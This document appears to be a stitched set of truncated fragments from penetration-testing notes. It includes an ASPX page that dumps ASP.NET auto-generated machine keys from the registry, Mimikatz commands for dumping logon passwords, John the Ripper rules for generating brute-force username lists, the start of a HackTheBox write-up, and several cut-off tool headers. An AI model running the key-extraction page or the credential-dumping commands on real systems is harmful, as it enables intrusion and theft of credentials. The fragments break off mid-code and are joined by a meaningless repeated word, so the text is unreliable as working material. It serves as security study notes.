affilares

/* ###
 * IP: GHIDRA
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 * 
 *      http://www.apache.org/licenses/LICENSE-2.0
 * 
 * Unless required by applicable law or agreed to in writing, software

affilares

<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
	Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)

affilares

# Generate loins from First name & Last name wordlist (case insensitive)
# https://dzmitry-savitski.github.io/2020/04/generate-a-user-name-list-for-brute-force-from-first-and-last-name
[List.Rules:Login-Generator-i]

# johndoe
%1?w l Dp

# john_doe
%1?w l op_

affilares

Scrambled vs NetExec

Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will pass the web part where we get one username : ksimpson

affilares

#!/usr/bin/env python3

import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep

affilares

#!/bin/env python3

import argparse
import datetime
import re
import sys
import uuid

###############################################################################
# Based off of Daniel Thatcher's guid tool

affilares

import socket
import random
import argparse
import sys
from io import BytesIO

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False

affilares

#general
privilege::debug
log
log customlogfilename.log


#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full

affilares

• commands.getoutput • commands.getstatus • commands.getstatusouput • compile • cPickle.load • cPickle.loads • eval • exec • execfile • marshal.load

affilares

• Dissecting Go Binaries
• Go: Overview of the Compiler
• Go compiler internals: adding a new statement to Go - Part 1
• Go compiler internals: adding a new statement to Go - Part 2
• Reversing GO binaries like a pro
• How a Go Program Compiles down to Machine Code
• Analyzing Golang Executables
• Go Reverse Engineering Tool Kit
• go-internals book
• [Reconstructing Program Semantics from Go Binaries](http://home.in.tum.de/